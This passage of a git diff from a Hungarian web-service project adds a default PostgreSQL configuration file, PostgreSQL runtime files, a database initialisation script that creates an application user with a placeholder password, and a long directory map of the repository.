Configuration - + +#enable_async_append = on +#enable_bitmapscan = on +#enable_gathermerge = on +#enable_hashagg = on +#enable_hashjoin = on +#enable_incremental_sort = on +#enable_indexscan = on +#enable_indexonlyscan = on +#enable_material = on +#enable_memoize = on +#enable_mergejoin = on +#enable_nestloop = on +#enable_parallel_append = on +#enable_parallel_hash = on +#enable_partition_pruning = on +#enable_partitionwise_join = off +#enable_partitionwise_aggregate = off +#enable_presorted_aggregate = on +#enable_seqscan = on +#enable_sort = on +#enable_tidscan = on +#enable_group_by_reordering = on + +# - Planner Cost Constants - + +#seq_page_cost = 1.0 # measured on an arbitrary scale +#random_page_cost = 4.0 # same scale as above +#cpu_tuple_cost = 0.01 # same scale as above +#cpu_index_tuple_cost = 0.005 # same scale as above +#cpu_operator_cost = 0.0025 # same scale as above +#parallel_setup_cost = 1000.0 # same scale as above +#parallel_tuple_cost = 0.1 # same scale as above +#min_parallel_table_scan_size = 8MB +#min_parallel_index_scan_size = 512kB +#effective_cache_size = 4GB + +#jit_above_cost = 100000 # perform JIT compilation if available + # and query more expensive than this; + # -1 disables +#jit_inline_above_cost = 500000 # inline small functions if query is + # more expensive than this; -1 disables +#jit_optimize_above_cost = 500000 # use expensive JIT optimizations if + # query is more expensive than this; + # -1 disables + +# - Genetic Query Optimizer - + +#geqo = on +#geqo_threshold = 12 +#geqo_effort = 5 # range 1-10 +#geqo_pool_size = 0 # selects default based on effort +#geqo_generations = 0 # selects default based on effort +#geqo_selection_bias = 2.0 # range 1.5-2.0 +#geqo_seed = 0.0 # range 0.0-1.0 + +# - Other Planner Options - + +#default_statistics_target = 100 # range 1-10000 +#constraint_exclusion = partition # on, off, or partition +#cursor_tuple_fraction = 0.1 # range 0.0-1.0 +#from_collapse_limit = 8 +#jit = on # allow JIT compilation +#join_collapse_limit = 8 # 1 disables collapsing of explicit + # JOIN clauses +#plan_cache_mode = auto # auto, force_generic_plan or + # force_custom_plan +#recursive_worktable_factor = 10.0 # range 0.001-1000000 + + +#------------------------------------------------------------------------------ +# REPORTING AND LOGGING +#------------------------------------------------------------------------------ + +# - Where to Log - + +#log_destination = 'stderr' # Valid values are combinations of + # stderr, csvlog, jsonlog, syslog, and + # eventlog, depending on platform. + # csvlog and jsonlog require + # logging_collector to be on. + +# This is used when logging to stderr: +#logging_collector = off # Enable capturing of stderr, jsonlog, + # and csvlog into log files. Required + # to be on for csvlogs and jsonlogs. + # (change requires restart) + +# These are only used if logging_collector is on: +#log_directory = 'log' # directory where log files are written, + # can be absolute or relative to PGDATA +#log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' # log file name pattern, + # can include strftime() escapes +#log_file_mode = 0600 # creation mode for log files, + # begin with 0 to use octal notation +#log_rotation_age = 1d # Automatic rotation of logfiles will + # happen after that time. 0 disables. +#log_rotation_size = 10MB # Automatic rotation of logfiles will + # happen after that much log output. + # 0 disables. +#log_truncate_on_rotation = off # If on, an existing log file with the + # same name as the new log file will be + # truncated rather than appended to. + # But such truncation only occurs on + # time-driven rotation, not on restarts + # or size-driven rotation. Default is + # off, meaning append to existing files + # in all cases. + +# These are relevant when logging to syslog: +#syslog_facility = 'LOCAL0' +#syslog_ident = 'postgres' +#syslog_sequence_numbers = on +#syslog_split_messages = on + +# This is only relevant when logging to eventlog (Windows): +# (change requires restart) +#event_source = 'PostgreSQL' + +# - When to Log - + +#log_min_messages = warning # values in order of decreasing detail: + # debug5 + # debug4 + # debug3 + # debug2 + # debug1 + # info + # notice + # warning + # error + # log + # fatal + # panic + +#log_min_error_statement = error # values in order of decreasing detail: + # debug5 + # debug4 + # debug3 + # debug2 + # debug1 + # info + # notice + # warning + # error + # log + # fatal + # panic (effectively off) + +#log_min_duration_statement = -1 # -1 is disabled, 0 logs all statements + # and their durations, > 0 logs only + # statements running at least this number + # of milliseconds + +#log_min_duration_sample = -1 # -1 is disabled, 0 logs a sample of statements + # and their durations, > 0 logs only a sample of + # statements running at least this number + # of milliseconds; + # sample fraction is determined by log_statement_sample_rate + +#log_statement_sample_rate = 1.0 # fraction of logged statements exceeding + # log_min_duration_sample to be logged; + # 1.0 logs all such statements, 0.0 never logs + + +#log_transaction_sample_rate = 0.0 # fraction of transactions whose statements + # are logged regardless of their duration; 1.0 logs all + # statements from all transactions, 0.0 never logs + +#log_startup_progress_interval = 10s # Time between progress updates for + # long-running startup operations. + # 0 disables the feature, > 0 indicates + # the interval in milliseconds. + +# - What to Log - + +#debug_print_parse = off +#debug_print_rewritten = off +#debug_print_plan = off +#debug_pretty_print = on +#log_autovacuum_min_duration = 10min # log autovacuum activity; + # -1 disables, 0 logs all actions and + # their durations, > 0 logs only + # actions running at least this number + # of milliseconds. +#log_checkpoints = on +#log_connections = off +#log_disconnections = off +#log_duration = off +#log_error_verbosity = default # terse, default, or verbose messages +#log_hostname = off +#log_line_prefix = '%m [%p] ' # special values: + # %a = application name + # %u = user name + # %d = database name + # %r = remote host and port + # %h = remote host + # %b = backend type + # %p = process ID + # %P = process ID of parallel group leader + # %t = timestamp without milliseconds + # %m = timestamp with milliseconds + # %n = timestamp with milliseconds (as a Unix epoch) + # %Q = query ID (0 if none or not computed) + # %i = command tag + # %e = SQL state + # %c = session ID + # %l = session line number + # %s = session start timestamp + # %v = virtual transaction ID + # %x = transaction ID (0 if none) + # %q = stop here in non-session + # processes + # %% = '%' + # e.g. '<%u%%%d> ' +#log_lock_waits = off # log lock waits >= deadlock_timeout +#log_recovery_conflict_waits = off # log standby recovery conflict waits + # >= deadlock_timeout +#log_parameter_max_length = -1 # when logging statements, limit logged + # bind-parameter values to N bytes; + # -1 means print in full, 0 disables +#log_parameter_max_length_on_error = 0 # when logging an error, limit logged + # bind-parameter values to N bytes; + # -1 means print in full, 0 disables +#log_statement = 'none' # none, ddl, mod, all +#log_replication_commands = off +#log_temp_files = -1 # log temporary files equal or larger + # than the specified size in kilobytes; + # -1 disables, 0 logs all temp files +log_timezone = UTC + +# - Process Title - + +#cluster_name = '' # added to process titles if nonempty + # (change requires restart) +#update_process_title = on + + +#------------------------------------------------------------------------------ +# STATISTICS +#------------------------------------------------------------------------------ + +# - Cumulative Query and Index Statistics - + +#track_activities = on +#track_activity_query_size = 1024 # (change requires restart) +#track_counts = on +#track_io_timing = off +#track_wal_io_timing = off +#track_functions = none # none, pl, all +#stats_fetch_consistency = cache # cache, none, snapshot + + +# - Monitoring - + +#compute_query_id = auto +#log_statement_stats = off +#log_parser_stats = off +#log_planner_stats = off +#log_executor_stats = off + + +#------------------------------------------------------------------------------ +# AUTOVACUUM +#------------------------------------------------------------------------------ + +#autovacuum = on # Enable autovacuum subprocess? 'on' + # requires track_counts to also be on. +#autovacuum_max_workers = 3 # max number of autovacuum subprocesses + # (change requires restart) +#autovacuum_naptime = 1min # time between autovacuum runs +#autovacuum_vacuum_threshold = 50 # min number of row updates before + # vacuum +#autovacuum_vacuum_insert_threshold = 1000 # min number of row inserts + # before vacuum; -1 disables insert + # vacuums +#autovacuum_analyze_threshold = 50 # min number of row updates before + # analyze +#autovacuum_vacuum_scale_factor = 0.2 # fraction of table size before vacuum +#autovacuum_vacuum_insert_scale_factor = 0.2 # fraction of inserts over table + # size before insert vacuum +#autovacuum_analyze_scale_factor = 0.1 # fraction of table size before analyze +#autovacuum_freeze_max_age = 200000000 # maximum XID age before forced vacuum + # (change requires restart) +#autovacuum_multixact_freeze_max_age = 400000000 # maximum multixact age + # before forced vacuum + # (change requires restart) +#autovacuum_vacuum_cost_delay = 2ms # default vacuum cost delay for + # autovacuum, in milliseconds; + # -1 means use vacuum_cost_delay +#autovacuum_vacuum_cost_limit = -1 # default vacuum cost limit for + # autovacuum, -1 means use + # vacuum_cost_limit + + +#------------------------------------------------------------------------------ +# CLIENT CONNECTION DEFAULTS +#------------------------------------------------------------------------------ + +# - Statement Behavior - + +#client_min_messages = notice # values in order of decreasing detail: + # debug5 + # debug4 + # debug3 + # debug2 + # debug1 + # log + # notice + # warning + # error +#search_path = '"$user", public' # schema names +#row_security = on +#default_table_access_method = 'heap' +#default_tablespace = '' # a tablespace name, '' uses the default +#default_toast_compression = 'pglz' # 'pglz' or 'lz4' +#temp_tablespaces = '' # a list of tablespace names, '' uses + # only default tablespace +#check_function_bodies = on +#default_transaction_isolation = 'read committed' +#default_transaction_read_only = off +#default_transaction_deferrable = off +#session_replication_role = 'origin' +#statement_timeout = 0 # in milliseconds, 0 is disabled +#transaction_timeout = 0 # in milliseconds, 0 is disabled +#lock_timeout = 0 # in milliseconds, 0 is disabled +#idle_in_transaction_session_timeout = 0 # in milliseconds, 0 is disabled +#idle_session_timeout = 0 # in milliseconds, 0 is disabled +#vacuum_freeze_table_age = 150000000 +#vacuum_freeze_min_age = 50000000 +#vacuum_failsafe_age = 1600000000 +#vacuum_multixact_freeze_table_age = 150000000 +#vacuum_multixact_freeze_min_age = 5000000 +#vacuum_multixact_failsafe_age = 1600000000 +#bytea_output = 'hex' # hex, escape +#xmlbinary = 'base64' +#xmloption = 'content' +#gin_pending_list_limit = 4MB +#createrole_self_grant = '' # set and/or inherit +#event_triggers = on + +# - Locale and Formatting - + +datestyle = 'iso, mdy' +#intervalstyle = 'postgres' +timezone = UTC +#timezone_abbreviations = 'Default' # Select the set of available time zone + # abbreviations. Currently, there are + # Default + # Australia (historical usage) + # India + # You can create your own file in + # share/timezonesets/. +#extra_float_digits = 1 # min -15, max 3; any value >0 actually + # selects precise output mode +#client_encoding = sql_ascii # actually, defaults to database + # encoding + +# These settings are initialized by initdb, but they can be changed. +lc_messages = 'en_US.utf8' # locale for system error message + # strings +lc_monetary = 'en_US.utf8' # locale for monetary formatting +lc_numeric = 'en_US.utf8' # locale for number formatting +lc_time = 'en_US.utf8' # locale for time formatting + +#icu_validation_level = warning # report ICU locale validation + # errors at the given level + +# default configuration for text search +default_text_search_config = 'pg_catalog.english' + +# - Shared Library Preloading - + +#local_preload_libraries = '' +#session_preload_libraries = '' +#shared_preload_libraries = '' # (change requires restart) +#jit_provider = 'llvmjit' # JIT library to use + +# - Other Defaults - + +#dynamic_library_path = '$libdir' +#gin_fuzzy_search_limit = 0 + + +#------------------------------------------------------------------------------ +# LOCK MANAGEMENT +#------------------------------------------------------------------------------ + +#deadlock_timeout = 1s +#max_locks_per_transaction = 64 # min 10 + # (change requires restart) +#max_pred_locks_per_transaction = 64 # min 10 + # (change requires restart) +#max_pred_locks_per_relation = -2 # negative values mean + # (max_pred_locks_per_transaction + # / -max_pred_locks_per_relation) - 1 +#max_pred_locks_per_page = 2 # min 0 + + +#------------------------------------------------------------------------------ +# VERSION AND PLATFORM COMPATIBILITY +#------------------------------------------------------------------------------ + +# - Previous PostgreSQL Versions - + +#array_nulls = on +#backslash_quote = safe_encoding # on, off, or safe_encoding +#escape_string_warning = on +#lo_compat_privileges = off +#quote_all_identifiers = off +#standard_conforming_strings = on +#synchronize_seqscans = on + +# - Other Platforms and Clients - + +#transform_null_equals = off +#allow_alter_system = on + + +#------------------------------------------------------------------------------ +# ERROR HANDLING +#------------------------------------------------------------------------------ + +#exit_on_error = off # terminate session on any error? +#restart_after_crash = on # reinitialize after backend crash? +#data_sync_retry = off # retry or panic on failure to fsync + # data? + # (change requires restart) +#recovery_init_sync_method = fsync # fsync, syncfs (Linux 5.8+) + + +#------------------------------------------------------------------------------ +# CONFIG FILE INCLUDES +#------------------------------------------------------------------------------ + +# These options allow settings to be loaded from files other than the +# default postgresql.conf. Note that these are directives, not variable +# assignments, so they can usefully be given more than once. + +#include_dir = '...' # include files ending in '.conf' from + # a directory, e.g., 'conf.d' +#include_if_exists = '...' # include file only if it exists +#include = '...' # include file + + +#------------------------------------------------------------------------------ +# CUSTOMIZED OPTIONS +#------------------------------------------------------------------------------ + +# Add settings for extensions here diff --git a/postgres/data/postmaster.opts b/postgres/data/postmaster.opts new file mode 100755 index 0000000..77c8b5d --- /dev/null +++ b/postgres/data/postmaster.opts @@ -0,0 +1 @@ +/usr/local/bin/postgres diff --git a/postgres/data/postmaster.pid b/postgres/data/postmaster.pid new file mode 100755 index 0000000..7c7f202 --- /dev/null +++ b/postgres/data/postmaster.pid @@ -0,0 +1,8 @@ +1 +/var/lib/postgresql/data +1768928065 +5432 +/var/run/postgresql +* + 1179695 0 +ready diff --git a/postgres/init-db.sql b/postgres/init-db.sql new file mode 100755 index 0000000..b4a47ce --- /dev/null +++ b/postgres/init-db.sql @@ -0,0 +1,19 @@ +-- 1. Alkalmazás felhasználó létrehozása (ha még nem létezik) +DO $$ +BEGIN + IF NOT EXISTS (SELECT FROM pg_catalog.pg_user WHERE usename = 'service_finder_app') THEN + CREATE USER service_finder_app WITH PASSWORD 'AppSafePass_2026'; -- Itt a valós jelszavadat használd + END IF; +END +$$; + +-- 2. Adatbázis létrehozása +-- Megjegyzés: A Docker alapértelmezetten létrehozza a POSTGRES_DB-t, +-- de biztosítjuk a létezését és a jogosultságokat. + +GRANT ALL PRIVILEGES ON DATABASE service_finder TO service_finder_app; + +-- 3. Séma jogosultságok beállítása +\c service_finder +GRANT ALL ON SCHEMA public TO service_finder_app; +ALTER SCHEMA public OWNER TO service_finder_app; diff --git a/projekt_terkep.txt b/projekt_terkep.txt new file mode 100755 index 0000000..ca26d88 --- /dev/null +++ b/projekt_terkep.txt @@ -0,0 +1,662 @@ +. +./docker-compose.yml +./postgres +./postgres/init-db.sql +./postgres/data +./postgres/data/pg_commit_ts +./postgres/data/pg_logical +./postgres/data/pg_logical/snapshots +./postgres/data/pg_logical/mappings +./postgres/data/pg_logical/replorigin_checkpoint +./postgres/data/base +./postgres/data/base/16384 +./postgres/data/base/5 +./postgres/data/base/16537 +./postgres/data/base/1 +./postgres/data/base/4 +./postgres/data/pg_hba.conf +./postgres/data/pg_dynshmem +./postgres/data/pg_xact +./postgres/data/pg_xact/0000 +./postgres/data/postgresql.auto.conf +./postgres/data/pg_stat +./postgres/data/PG_VERSION +./postgres/data/pg_stat_tmp +./postgres/data/pg_subtrans +./postgres/data/pg_subtrans/0000 +./postgres/data/pg_ident.conf +./postgres/data/pg_snapshots +./postgres/data/global +./postgres/data/global/1232 +./postgres/data/global/pg_filenode.map +./postgres/data/global/6001 +./postgres/data/global/1260_vm +./postgres/data/global/2677 +./postgres/data/global/2847 +./postgres/data/global/1262 +./postgres/data/global/3592 +./postgres/data/global/4177 +./postgres/data/global/3593 +./postgres/data/global/4185 +./postgres/data/global/2676 +./postgres/data/global/2396 +./postgres/data/global/1261_vm +./postgres/data/global/2671 +./postgres/data/global/6243 +./postgres/data/global/pg_internal.init +./postgres/data/global/2964 +./postgres/data/global/4182 +./postgres/data/global/1260_fsm +./postgres/data/global/4181 +./postgres/data/global/4178 +./postgres/data/global/1213_fsm +./postgres/data/global/4175 +./postgres/data/global/1261 +./postgres/data/global/2695 +./postgres/data/global/1233 +./postgres/data/global/4186 +./postgres/data/global/4183 +./postgres/data/global/2396_fsm +./postgres/data/global/4061 +./postgres/data/global/2694 +./postgres/data/global/6000 +./postgres/data/global/4184 +./postgres/data/global/1260 +./postgres/data/global/pg_control +./postgres/data/global/2967 +./postgres/data/global/6100 +./postgres/data/global/1262_vm +./postgres/data/global/2397 +./postgres/data/global/6244 +./postgres/data/global/6246 +./postgres/data/global/6002 +./postgres/data/global/1262_fsm +./postgres/data/global/4176 +./postgres/data/global/6114 +./postgres/data/global/6245 +./postgres/data/global/2672 +./postgres/data/global/1214_fsm +./postgres/data/global/1261_fsm +./postgres/data/global/4060 +./postgres/data/global/2966 +./postgres/data/global/6247 +./postgres/data/global/2846 +./postgres/data/global/1213_vm +./postgres/data/global/6302 +./postgres/data/global/6115 +./postgres/data/global/2396_vm +./postgres/data/global/2698 +./postgres/data/global/2697 +./postgres/data/global/2965 +./postgres/data/global/1214 +./postgres/data/global/6303 +./postgres/data/global/1213 +./postgres/data/pg_serial +./postgres/data/pg_replslot +./postgres/data/pg_tblspc +./postgres/data/pg_multixact +./postgres/data/pg_multixact/members +./postgres/data/pg_multixact/offsets +./postgres/data/pg_twophase +./postgres/data/pg_notify +./postgres/data/postgresql.conf +./postgres/data/pg_wal +./postgres/data/pg_wal/summaries +./postgres/data/pg_wal/archive_status +./postgres/data/pg_wal/000000010000000000000002 +./postgres/data/pg_wal/000000010000000000000003 +./postgres/data/postmaster.opts +./postgres/data/postmaster.pid +./docker-compose_2.yml +./migrations +./migrations/script.py.mako +./migrations/env.py +./migrations/README +./migrations/versions +./migrations/versions/8d450e9dc77f_add_vehicle_staging.py +./migrations/versions/553ef1388276_rebuild_schema_v2.py +./migrations/versions/c21c2c7e70d4_clean_gamification_setup.py +./Projekt Állapot jelentés.txt +./redis +./redis/data +./redis/data/appendonlydir +./redis/data/appendonlydir/appendonly.aof.1.incr.aof +./redis/data/appendonlydir/appendonly.aof.manifest +./redis/data/appendonlydir/appendonly.aof.1.base.rdb +./redis/data/dump.rdb +./Service_finder Rendszerspecifikáció es feljesztes.txt +./Promptok gemekhez.txt +./pgadmin_data +./pgadmin_data/sessions +./pgadmin_data/sessions/f77af245-3aa1-4f88-a566-3be55403448f +./pgadmin_data/sessions/239aceee-a89e-434c-980e-19e2421de51f +./pgadmin_data/sessions/643b0d62-38a1-4a32-b48b-f7e053e7214f +./pgadmin_data/sessions/c38b97cd-80d7-40e1-8ab7-b9a650b38d59 +./pgadmin_data/sessions/1e451e39-aae8-4a80-9e06-e600209173eb +./pgadmin_data/sessions/cda27660-0b33-4cfa-9a6f-6b61152e20ca +./pgadmin_data/sessions/39c9dfe9-7b34-43f8-91b3-6fa3f6d266b3 +./pgadmin_data/sessions/6f69a6f6-75b8-4460-a933-45e989a1745b +./pgadmin_data/sessions/a581e329-7bfb-4698-838d-73cfacdc8490 +./pgadmin_data/sessions/d0fbabe6-ad5f-4e80-b95c-ddce91f12be3 +./pgadmin_data/sessions/8bcb89fe-0895-4cfd-9520-bb8395741163 +./pgadmin_data/sessions/a7b4bf94-c3e4-4d6b-9bfb-1838af5757b2 +./pgadmin_data/sessions/4ab9a4ed-3382-45b3-bc68-b03198aa8351 +./pgadmin_data/sessions/d88c19a7-77d9-4beb-ab76-a84a9f37157d +./pgadmin_data/sessions/75f2578e-af2c-4aee-9d2d-cc8636ed51be +./pgadmin_data/sessions/8288a605-5063-4e3c-b91d-7d90956fc36a +./pgadmin_data/sessions/e409093c-23c6-4281-bd8e-5ae1dd8fd244 +./pgadmin_data/sessions/21bf4030-2f8b-4d39-9ea5-4b9091443cb8 +./pgadmin_data/sessions/80adb826-82c5-4473-84a3-b69b59a5c694 +./pgadmin_data/sessions/5493e7a3-35c7-48ae-89af-246e7f0b1198 +./pgadmin_data/sessions/cb6a3940-36e0-406e-8072-3ce847b85eab +./pgadmin_data/sessions/7a61650b-174f-4eee-a30d-8e8e2b9bf42a +./pgadmin_data/sessions/4212d725-cfca-4edb-b3d4-65872c5b4483 +./pgadmin_data/sessions/cd78b8b9-bb98-4343-9ec3-9e4663e0965c +./pgadmin_data/sessions/8f58c8db-3320-4ff4-83c9-529ceeb47320 +./pgadmin_data/sessions/fbabc57a-b2d4-4c85-9cbd-fa70f2a374e7 +./pgadmin_data/sessions/49b63a43-ac7f-4a1e-a2f5-eb69c394ffe9 +./pgadmin_data/sessions/e87026e5-efa4-4618-9c56-e11cef97b2bb +./pgadmin_data/sessions/aebf219d-1063-4ee8-a00e-8c669ca8c649 +./pgadmin_data/sessions/6ea13bd9-7894-44b0-8db2-1cd0d67772ac +./pgadmin_data/sessions/d9d24318-63af-48ad-9a5f-e463377d72b3 +./pgadmin_data/sessions/a7c55d8e-62d1-47e5-8507-29c228d9c9b1 +./pgadmin_data/sessions/981d317b-8dec-40b0-a16f-d8d64b36a8ff +./pgadmin_data/sessions/62906837-2ecb-468a-8fef-5fd1374773a9 +./pgadmin_data/sessions/3aeb0610-d402-481d-83b7-cc6282b7fe40 +./pgadmin_data/sessions/6d07e92a-9824-4cc3-837a-9ea25e789ca9 +./pgadmin_data/sessions/c0936831-8a62-4156-884e-7e72173571d7 +./pgadmin_data/sessions/13e7ff42-4934-4a5e-b5a3-f677f6429cc1 +./pgadmin_data/sessions/96f17aad-5695-40c9-b467-154246f14580 +./pgadmin_data/sessions/9685519b-269d-4e56-a595-6cfa40c572a0 +./pgadmin_data/sessions/0d358dcb-bbfb-43ca-ab93-be47f5ed25f1 +./pgadmin_data/sessions/8b017d63-49c6-4c72-bd4c-1f1121c48229 +./pgadmin_data/sessions/0c5d8f55-57c2-4d9b-a740-71c3eb24bced +./pgadmin_data/sessions/9a707a69-cbea-4d2a-aee2-ed186b0bd192 +./pgadmin_data/sessions/2c0c4448-d3e4-4c90-9af6-33a0c0bf0ef1 +./pgadmin_data/sessions/179ac2a4-8dc3-4db0-9208-ff985d0c88e0 +./pgadmin_data/sessions/c73fe338-3ab0-46b7-81fa-276fc8acaa88 +./pgadmin_data/sessions/15c03d02-36ed-47f1-a77c-2f4af9e68504 +./pgadmin_data/sessions/215e7cd3-169f-4b75-8cd6-0081734aa571 +./pgadmin_data/sessions/7c847da4-61d0-4056-8e32-906919e72acf +./pgadmin_data/sessions/c78fd088-66d3-4854-9093-b5f91eed7f87 +./pgadmin_data/sessions/62d142cc-ab15-4f3f-8411-b668bd926f4f +./pgadmin_data/sessions/ec291f35-5e20-4f9a-af16-e44624d57074 +./pgadmin_data/sessions/f86f30a7-2680-4a43-bb3f-d1d5dc04131f +./pgadmin_data/sessions/4256aa82-0066-4a50-a4d9-2a0673705554 +./pgadmin_data/sessions/f8390327-d516-45b0-9df7-fb84ab84b11d +./pgadmin_data/sessions/6be9f86e-c004-466e-af2e-9046b971b9fc +./pgadmin_data/sessions/d983dfc1-ed31-4b49-8a99-85787b3b8851 +./pgadmin_data/sessions/b87ca5ef-affd-4ac9-b9a3-640c274e05bf +./pgadmin_data/sessions/dfb0274f-c907-47ef-92ec-267f72853f21 +./pgadmin_data/sessions/6afc4e86-4d72-45d7-9efb-59984ee613f9 +./pgadmin_data/sessions/8259d216-9011-4518-9e07-47f62b09c8c2 +./pgadmin_data/sessions/3d86d01a-9519-4111-8bd7-1bfe6ae30541 +./pgadmin_data/sessions/10fdc4de-ff73-4b15-bd76-5f963b52ad5a +./pgadmin_data/sessions/47ff632a-5d39-43f1-977b-4acfa2911536 +./pgadmin_data/sessions/a4f6dc64-606d-4cc7-a7c9-b53552e03155 +./pgadmin_data/sessions/ffa5e983-2527-46c6-8be3-9ed04485a6ce +./pgadmin_data/sessions/251262f2-ff86-407a-b565-afc083e8f815 +./pgadmin_data/sessions/85541a74-441c-4c41-a1e8-2d4748704ba4 +./pgadmin_data/sessions/769ea067-659f-47a7-916f-422945f31749 +./pgadmin_data/sessions/8b50c5b9-f372-4722-946a-5b98d8f6204b +./pgadmin_data/sessions/03fd18e1-b040-4d4a-b1eb-01f30054b114 +./pgadmin_data/sessions/5697ad9e-3978-495b-b45d-bd8171697395 +./pgadmin_data/sessions/6e772ba6-65b4-4501-84ea-ebcafa24cd85 +./pgadmin_data/sessions/8176c2c0-467d-4b27-a17a-52c204cd9773 +./pgadmin_data/sessions/d98a8f90-8f2e-41e4-8305-16d3dd79d54a +./pgadmin_data/sessions/8ff1ea1c-d1b9-46f8-8a16-40bcac83f250 +./pgadmin_data/storage +./pgadmin_data/storage/kincses_gmail.com +./pgadmin_data/pgadmin4.db +./pgadmin_data/azurecredentialcache +./docker-compose_2026.01.23_1.yml +./backend +./backend/migrations +./backend/migrations/script.py.mako +./backend/migrations/env.py +./backend/migrations/README +./backend/migrations/versions +./backend/migrations/versions/c21c2c7e70d4_clean_gamification_setup.py +./backend/app +./backend/app/models +./backend/app/models/user.py +./backend/app/models/translation.py +./backend/app/models/vehicle.py +./backend/app/models/vehicle_catalog.py +./backend/app/models/expense.py +./backend/app/models/company.py +./backend/app/models/logistics.py +./backend/app/models/system_settings.py +./backend/app/models/__init__.py +./backend/app/models/staged_data.py +./backend/app/models/history.py +./backend/app/models/social.py +./backend/app/models/gamification.py +./backend/app/core +./backend/app/core/config.py +./backend/app/core/email.py +./backend/app/core/security.py +./backend/app/core/__init__.py +./backend/app/seed_catalog.py +./backend/app/auth +./backend/app/auth/router.py +./backend/app/schemas +./backend/app/schemas/user.py +./backend/app/schemas/auth.py +./backend/app/schemas/token.py +./backend/app/schemas/admin.py +./backend/app/schemas/fleet.py +./backend/app/schemas/social.py +./backend/app/old_main.py +./backend/app/api +./backend/app/api/recommend.py +./backend/app/api/auth.py +./backend/app/api/deps.py +./backend/app/api/v1 +./backend/app/services +./backend/app/services/notification_service.py +./backend/app/services/fleet_service.py +./backend/app/services/maintenance_service.py +./backend/app/services/social_service.py +./backend/app/services/translation_service.py +./backend/app/services/gamification_service.py +./backend/app/test_gamification_flow.py +./backend/app/db +./backend/app/db/context.py +./backend/app/db/session.py +./backend/app/db/base.py +./backend/app/db/middleware.py +./backend/app/db/__init__.py +./backend/app/main.py +./backend/app/__init__.py +./backend/app/seed_system.py +./backend/app/database.py +./backend/app/seed_data.py +./backend/scrapers +./backend/scrapers/vehicle_master_data.py +./backend/requirements.txt +./backend/_legacy_backup +./backend/_legacy_backup/migrate_ref_data.py +./backend/_legacy_backup/check_garage.py +./backend/_legacy_backup/main_final.py +./backend/_legacy_backup/teszt.txt +./backend/_legacy_backup/docker-compose.backend.yml +./backend/_legacy_backup/update_permissions.py +./backend/_legacy_backup/update_cost_categories.py +./backend/_legacy_backup/inspect_db.py +./backend/_legacy_backup/update_invitations.py +./backend/_legacy_backup/build_complex_db.py +./backend/_legacy_backup/update_db_i18n.py +./backend/_legacy_backup/update_audit_system.py +./backend/_legacy_backup/create_demo_user.py +./backend/_legacy_backup/init_db.py +./backend/_legacy_backup/main.py +./backend/_legacy_backup/main_fixed.py +./backend/_legacy_backup/update_docs.py +./backend/_legacy_backup/create_dummy_employee.py +./backend/_legacy_backup/inspect_db_full.py +./backend/_legacy_backup/main_2.py +./backend/Dockerfile +./backend/frontend +./backend/alembic.ini +./projekt_terkep.txt +./backup_to_nas.sh +./proxy-manager +./proxy-manager/letsencrypt +./proxy-manager/letsencrypt/archive +./proxy-manager/letsencrypt/archive/npm-13 +./proxy-manager/letsencrypt/archive/npm-16 +./proxy-manager/letsencrypt/archive/npm-5 +./proxy-manager/letsencrypt/archive/npm-15 +./proxy-manager/letsencrypt/archive/npm-11 +./proxy-manager/letsencrypt/archive/npm-14 +./proxy-manager/letsencrypt/archive/npm-4 +./proxy-manager/letsencrypt/renewal-hooks +./proxy-manager/letsencrypt/renewal-hooks/pre +./proxy-manager/letsencrypt/renewal-hooks/deploy +./proxy-manager/letsencrypt/renewal-hooks/post +./proxy-manager/letsencrypt/renewal +./proxy-manager/letsencrypt/renewal/npm-16.conf +./proxy-manager/letsencrypt/renewal/npm-5.conf +./proxy-manager/letsencrypt/renewal/npm-13.conf +./proxy-manager/letsencrypt/renewal/npm-4.conf +./proxy-manager/letsencrypt/renewal/npm-15.conf +./proxy-manager/letsencrypt/renewal/npm-14.conf +./proxy-manager/letsencrypt/renewal/npm-11.conf +./proxy-manager/letsencrypt/live +./proxy-manager/letsencrypt/live/npm-13 +./proxy-manager/letsencrypt/live/npm-16 +./proxy-manager/letsencrypt/live/npm-5 +./proxy-manager/letsencrypt/live/npm-15 +./proxy-manager/letsencrypt/live/npm-11 +./proxy-manager/letsencrypt/live/npm-14 +./proxy-manager/letsencrypt/live/README +./proxy-manager/letsencrypt/live/npm-4 +./proxy-manager/letsencrypt/accounts +./proxy-manager/letsencrypt/accounts/acme-v02.api.letsencrypt.org +./proxy-manager/data +./proxy-manager/data/nginx +./proxy-manager/data/nginx/dead_host +./proxy-manager/data/nginx/proxy_host +./proxy-manager/data/nginx/default_www +./proxy-manager/data/nginx/default_host +./proxy-manager/data/nginx/redirection_host +./proxy-manager/data/nginx/stream +./proxy-manager/data/nginx/temp +./proxy-manager/data/keys.json +./proxy-manager/data/letsencrypt-acme-challenge +./proxy-manager/data/database.sqlite +./proxy-manager/data/access +./proxy-manager/data/custom_ssl +./proxy-manager/data/logs +./proxy-manager/data/logs/fallback_access.log.1.gz +./proxy-manager/data/logs/letsencrypt.log.8 +./proxy-manager/data/logs/proxy-host-8_access.log +./proxy-manager/data/logs/fallback_error.log.2.gz +./proxy-manager/data/logs/letsencrypt.log.6 +./proxy-manager/data/logs/fallback_access.log.3.gz +./proxy-manager/data/logs/proxy-host-3_access.log.3.gz +./proxy-manager/data/logs/letsencrypt.log.15 +./proxy-manager/data/logs/proxy-host-1_access.log +./proxy-manager/data/logs/letsencrypt-requests_access.log.1.gz +./proxy-manager/data/logs/proxy-host-2_access.log.1.gz +./proxy-manager/data/logs/letsencrypt.log.9 +./proxy-manager/data/logs/proxy-host-2_error.log.1.gz +./proxy-manager/data/logs/letsencrypt.log.4 +./proxy-manager/data/logs/letsencrypt.log.10 +./proxy-manager/data/logs/fallback_error.log.1.gz +./proxy-manager/data/logs/proxy-host-1_error.log.2.gz +./proxy-manager/data/logs/proxy-host-7_access.log +./proxy-manager/data/logs/proxy-host-2_error.log.2.gz +./proxy-manager/data/logs/letsencrypt-requests_error.log +./proxy-manager/data/logs/letsencrypt.log.13 +./proxy-manager/data/logs/proxy-host-9_access.log +./proxy-manager/data/logs/proxy-host-2_error.log.3.gz +./proxy-manager/data/logs/proxy-host-6_access.log +./proxy-manager/data/logs/proxy-host-1_access.log.3.gz +./proxy-manager/data/logs/proxy-host-6_access.log.1.gz +./proxy-manager/data/logs/proxy-host-6_error.log.3.gz +./proxy-manager/data/logs/proxy-host-2_access.log.3.gz +./proxy-manager/data/logs/proxy-host-8_error.log +./proxy-manager/data/logs/proxy-host-6_error.log.1.gz +./proxy-manager/data/logs/letsencrypt.log.16 +./proxy-manager/data/logs/fallback_access.log.2.gz 